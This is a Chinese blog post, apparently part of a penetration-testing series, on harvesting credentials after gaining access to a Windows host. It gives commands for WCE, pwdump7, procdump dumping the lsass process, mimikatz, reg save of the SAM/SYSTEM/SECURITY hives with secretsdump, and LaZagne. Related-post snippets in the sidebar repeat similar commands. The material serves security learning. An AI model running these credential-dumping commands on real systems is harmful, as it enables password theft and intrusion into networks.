内网渗透之内网信息收集(六)

已于 2022-09-14 19:52:49 修改
阅读量1.1k 收藏 10
点赞数 12
分类专栏: # 内网渗透 网络安全 文章标签: 安全
于 2022-07-06 17:48:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/125644747
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

凭证信息收集

05wce

06pwddump7

07ophcrack

08Procdump+Mimikatz (常用免杀)

09注册表导出hash

10lazagne

内网渗透之内网信息收集(七)_不知名白帽的博客-CSDN博客

凭证信息收集

05wce

WCE:windows credentials editor

WCE是跟mimikatz齐名的一款hash管理工具

官网地址:https://www.ampliasecurity.com/research.html

32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

历史版本下载:https://www.ampliasecurity.com/research/windows-credentials-editor/

WCE使用说明:

wce.exe -l(获取用户哈希)

wce.exe -w(获取用户明文密码)

06pwddump7

这款工具可以读取出当前系统的各个用户的密码hash(包括LM和NTLM)

在命令行输入Pwddump7.txt就可以读取出hash并显示出来,也可以保存到一个文件中

07ophcrack

如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。

工具下载:https://ophcrack.sourceforge.io/

彩虹表:

https://ophcrack.sourceforge.io/tables.php

http://project-rainbowcrack.com/table.htm

08Procdump+Mimikatz (常用免杀)

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Procdump lsass 进程导出:

For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp

For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

然后使用mimikatz还原密码:

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

09注册表导出hash

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\SECURITY security.hiv

导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。

mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

10lazagne

LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序。 每个软件都使用不同的技术(纯文本、API、自定义算法、数据库等)存储其密码。LaZagne 的作用就是找到最常用的一些软件的密码。 LaZagne 几乎支持市面上大部分常用工具。包括浏览器、Git、SVN、Wifi、Databases 等。但是对聊天软件的支持不够本土化,主要支持一些国外的聊天软件。

抓取所有支持软件的密码:

lazagne.exe all

不知名白帽
关注
专栏目录
内网渗透(十二)之内网信息收集-内网端口扫描和发现
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-09 876
通过查询目标主机的端口开放信息,不仅可以了解目标主机所开放的服务,还可以找出其开放服务的涌洞、分析目标网络的拓扑结构等, 在进行内网渗测试时,通常会使用Metasploit内置的端口进行扫描。也可以上传端口扫描工具,使用工具进行扫描。还可以根据服务器的环境,使用自定义的端口扫描脚本进行扫描。在获得授权的情况下,可以直接使用Nmap、masscan等端口扫描工具获取开放的端口信息。
Windows密码哈希值获取工具
最新发布
AI
06-07 1311
mimikatz是法国人Benjamin开发的一款功能强大的轻量级调试工具,本意是用来进行个人测试的,但由于其功能强大,能够直接读取Windows操作系统的明文密码,因而闻名于渗透测试领域,可以说是渗透必备工具。这些功能在内网渗透中能够被利用,例如在Windows平台上执行绕过Hash或从内存中获取NT/LM hashes(也可以从交互式登录、服务、远程桌面连接中获取 ),以用于进一步的攻击,而且它的体积也非常小,是内网渗透必备工具。通过下载或直接执行该ps脚本即可获取Windows密码。
01-windows调试工具(ProcDump使用)
qq_37103755的博客
11-21 7224
windows ProcDump工具使用
Windows密码凭证获取学习
crowsec
08-08 4701
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
导出系统注册表抓Hash的思路整理
fengling132的专栏
05-02 3105
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的, reg save hklm\sam sam.hive  reg save hklm\system ystem.hive  reg save hklm\security security.hiv
Windows Credentials Editor v1.2 (WCE)在***过程中的关键作用
weixin_34372728的博客
08-28 291
昨天G0t3n聊天,G0t3n说起Windows Credentials Editor v1.2 (WCE)这款软件,除了抓HASH,还能注入HASH***,提升为域管理员权限。 参数如下: -l List logon sessions and NTLM credentials (default). -s...
内网渗透内网信息收集(综合)
墨鱼菜鸡
09-10 528
目录 Metasploit内网信息收集 01msf反弹shell 02msf反弹shell 03通过shell关闭防火墙 04关闭杀毒软件 05打开并连接3389 06数据包抓取 07口令破解 普通用户提权 08other 09scraper 09winenum 10msf主机发现 11msf端口扫描 12服务扫描与查点 ...
内网渗透测试之信息收集.pdf
03-17
内网渗透测试的信息收集是渗透测试工作中极为关键的一步,它决定了后续渗透测试的方向和深度。信息收集通常分为手工信息收集和自动化信息收集,通过多种手段来获取目标内网的详细信息,以利于后续的攻击和渗透。 ...
内网渗透之域渗透.pdf
08-07
内网渗透和域渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...
wce.exe跑hash,
06-23
wce64位,支持windows server 2008 r2 不过赛门铁克
pwdump7.00.rar
03-29
彩虹表工具使用讲解 用 PWdumpd从系统中提取HASH 需要软件:ophcrack和彩虹表 1 安装ophcrack 2 选择彩虹表[彩虹表要放到英文目录下] 3 把hash导入破解
SharpSecDump:.Impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
复检网站_渗透测试项目分析手段
网站安全专家
09-26 607
最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查,部分防守方缺乏对攻击者的正确认知,攻击者的手法已经比较高超了,不扫描,不落地,污染日志等都很普及了。同时也要正确认知对手:攻防演练中,攻击者并非无所不能,他们面临着和防御方一样的问题:时间紧,任务重。所以攻击者的攻击目标,攻击手法也是有迹可循的,知己知彼才能百战百胜。 渗透测试 一、知彼 攻击者也是讲成本的,因此防守方最...
密码抓取--reg免杀抓hash
网络安全。
02-13 1255
1、下载下面3个文件 reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv reg save hklm\security security.hiv 2、获取密码hash 方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致) mimikatz.exe “lsadump::sam /system:sys.hiv /sam:...
内网渗透-信息收集之本机收集(命令、工具及脚本)
nilwiaoglwigjwlg的博客
09-25 6360
后渗透攻防: https://www.secpulse.com/archives/51527.html https://3gstudent.github.io/ 目录 一、内网信息收集 1 1.内网基础信息: 1 2.内网核心业务信息: 1 3.其他信息 2 二、内网实战(命令、工具及脚本) 2 1.用户列表、当前权限等 2 2.内网网络拓扑等信息 2 3.进程列表 3 4.端口信息 3 5.补丁...
使用wce进行本地和域的hash注入
weixin_30455661的博客
08-16 394
wce是与gethashes 和mimikatz齐名的一款hash管理工具,具体的作用应该不需要我多说 wce已经更新到1.4下载地址如下 http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip http:/...
获取windows hash的几种方式
lansefly1990的专栏
02-26 6787
一、windows hash介绍 NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash 该hash的生成方法: 将明文口令转换成十进制的格式; 转换成Unicode格式,即在每个字节之后添加0x00; 对Unicode字符串作MD4加密,生成32位的十进制数字串; 如测试测试密码为haha123 转成十进制为:...
服务器读取账号密码,WIN服务器得明文密码神器 mimikatz、WCE
weixin_31621945的博客
07-29 1240
一、mimikatz(自己亲试,可以在win7 x64下使用)昨天有朋友发了个法国佬写的神器叫mimikatz让我们看下还有一篇用这个神器直接从 lsass.exe里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass自己...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值